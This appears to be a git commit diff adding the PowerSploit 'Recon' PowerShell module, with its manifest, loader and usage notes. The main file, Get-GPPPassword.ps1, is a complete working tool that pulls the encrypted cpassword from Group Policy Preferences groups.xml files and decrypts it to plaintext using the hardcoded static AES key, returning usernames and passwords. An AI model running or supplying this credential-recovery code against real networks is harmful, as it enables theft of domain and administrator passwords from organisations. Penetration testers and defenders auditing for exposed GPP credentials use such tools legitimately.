diff options
| -rw-r--r-- | Recon/Get-GPPPassword.ps1 | 98 | ||||
| -rw-r--r-- | Recon/Recon.psd1 | 88 | ||||
| -rw-r--r-- | Recon/Recon.psm1 | 1 | ||||
| -rw-r--r-- | Recon/Usage.md | 12 |
4 files changed, 199 insertions, 0 deletions
diff --git a/Recon/Get-GPPPassword.ps1 b/Recon/Get-GPPPassword.ps1 new file mode 100644 index 0000000..99a694b --- /dev/null +++ b/Recon/Get-GPPPassword.ps1 @@ -0,0 +1,98 @@ +function Get-GPPPassword {
+
+<#
+.Synopsis
+
+ Get-GPPPassword retrieves the plaintext password for accounts pushed through Group Policy in groups.xml.
+ Author: Chris Campbell (@obscuresec)
+ License: BSD 3-Clause
+
+.Description
+
+ Get-GPPPassword imports the encoded and encrypted password string from groups.xml and then decodes and decrypts the plaintext password.
+
+.Parameter Path
+
+ The path to the targeted groups.xml file.
+
+.Example
+
+ Get-GPPPassword -path c:\demo\groups.xml
+
+.Link
+
+ http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences
+ http://www.obscuresecurity.blogspot.com/2012/05/gpp-password-retrieval-with-powershell.html
+#>
+
+Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Path = "$PWD\groups.xml" )
+
+ #Function to pull encrypted password string from groups.xml
+ function Parse-cPassword {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [String] $Cpassword = $Xml.Groups.User.Properties.cpassword
+ } catch { Write-Error "No Password Policy Found in File!" }
+
+ return $Cpassword
+ }
+
+ #Function to look to see if the administrator account is given a newname
+ function Parse-NewName {
+
+ [xml] $Xml = Get-Content ($Path)
+ [String] $NewName = $Xml.Groups.User.Properties.newName
+
+ return $NewName
+ }
+
+ #Function to parse out the Username whose password is being specified
+ function Parse-UserName {
+
+ try {
+ [xml] $Xml = Get-Content ($Path)
+ [string] $UserName = $Xml.Groups.User.Properties.userName
+ } catch { Write-Error "No Username Specified in File!" }
+
+ return $UserName
+ }
+
+ #Function that decodes and decrypts password
+ function Decrypt-Password {
+
+ try {
+ #Append appropriate padding based on string length
+ $Pad = "=" * (4 - ($Cpassword.length % 4))
+ $Base64Decoded = [Convert]::FromBase64String($Cpassword + $Pad)
+ #Create a new AES .NET Crypto Object
+ $AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
+ #Static Key from http://msdn.microsoft.com/en-us/library/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be%28v=PROT.13%29#endNote2
+ [Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
+ 0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
+ #Set IV to all nulls (thanks Matt) to prevent dynamic generation of IV value
+ $AesIV = New-Object Byte[]($AesObject.IV.Length)
+ $AesObject.IV = $AesIV
+ $AesObject.Key = $AesKey
+ $DecryptorObject = $AesObject.CreateDecryptor()
+ [Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
+
+ return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
+ } catch { Write-Error "Decryption Failed!" }
+
+ }
+
+ $Cpassword = Parse-cPassword
+ $Password = Decrypt-Password
+ $NewName = Parse-NewName
+ $UserName = Parse-UserName
+
+ $Results = New-Object System.Object
+
+ Add-Member -InputObject $Results -type NoteProperty -name UserName -value $UserName
+ Add-Member -InputObject $Results -type NoteProperty -name NewName -value $NewName
+ Add-Member -InputObject $Results -type NoteProperty -name Password -value $Password
+
+ return $Results
+
+}
diff --git a/Recon/Recon.psd1 b/Recon/Recon.psd1 new file mode 100644 index 0000000..59c6377 --- /dev/null +++ b/Recon/Recon.psd1 @@ -0,0 +1,88 @@ +@{
+
+# Script module or binary module file associated with this manifest.
+ModuleToProcess = 'Recon.psm1'
+
+# Version number of this module.
+ModuleVersion = '1.0.0.0'
+
+# ID used to uniquely identify this module
+GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'
+
+# Author of this module
+Author = 'Matthew Graeber'
+
+# Company or vendor of this module
+CompanyName = ''
+
+# Copyright statement for this module
+Copyright = 'BSD 3-Clause'
+
+# Description of the functionality provided by this module
+Description = 'PowerSploit Reconnaissance Module'
+
+# Minimum version of the Windows PowerShell engine required by this module
+PowerShellVersion = '2.0'
+
+# Name of the Windows PowerShell host required by this module
+# PowerShellHostName = ''
+
+# Minimum version of the Windows PowerShell host required by this module
+# PowerShellHostVersion = ''
+
+# Minimum version of the .NET Framework required by this module
+# DotNetFrameworkVersion = ''
+
+# Minimum version of the common language runtime (CLR) required by this module
+# CLRVersion = ''
+
+# Processor architecture (None, X86, Amd64) required by this module
+# ProcessorArchitecture = ''
+
+# Modules that must be imported into the global environment prior to importing this module
+# RequiredModules = @()
+
+# Assemblies that must be loaded prior to importing this module
+# RequiredAssemblies = @()
+
+# Script files (.ps1) that are run in the caller's environment prior to importing this module.
+# ScriptsToProcess = ''
+
+# Type files (.ps1xml) to be loaded when importing this module
+# TypesToProcess = @()
+
+# Format files (.ps1xml) to be loaded when importing this module
+# FormatsToProcess = @()
+
+# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
+# NestedModules = @()
+
+# Functions to export from this module
+FunctionsToExport = '*'
+
+# Cmdlets to export from this module
+CmdletsToExport = '*'
+
+# Variables to export from this module
+VariablesToExport = ''
+
+# Aliases to export from this module
+AliasesToExport = ''
+
+# List of all modules packaged with this module.
+ModuleList = @(@{ModuleName = 'Recon'; ModuleVersion = '1.0.0.0'; GUID = '7e775ad6-cd3d-4a93-b788-da067274c877'})
+
+# List of all files packaged with this module
+FileList = 'Recon.psm1', 'Recon.psd1', 'Get-GPPPassword.ps1', 'Get-HttpStatus.ps1',
+ 'Invoke-ReverseDnsLookup.ps1', 'Usage.md'
+
+# Private data to pass to the module specified in RootModule/ModuleToProcess
+# PrivateData = ''
+
+# HelpInfo URI of this module
+# HelpInfoURI = ''
+
+# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
+# DefaultCommandPrefix = ''
+
+}
\ No newline at end of file diff --git a/Recon/Recon.psm1 b/Recon/Recon.psm1 new file mode 100644 index 0000000..e5234fb --- /dev/null +++ b/Recon/Recon.psm1 @@ -0,0 +1 @@ +Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
\ No newline at end of file diff --git a/Recon/Usage.md b/Recon/Usage.md new file mode 100644 index 0000000..9bfe35e --- /dev/null +++ b/Recon/Usage.md @@ -0,0 +1,12 @@ +To install this module, drop the entire Recon folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
+
+The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
+The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
+
+To use the module, type `Import-Module Recon`
+
+To see the commands imported, type `Get-Command -Module Recon`
+
+For help on each individual command, Get-Help is your friend.
+
+Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
\ No newline at end of file |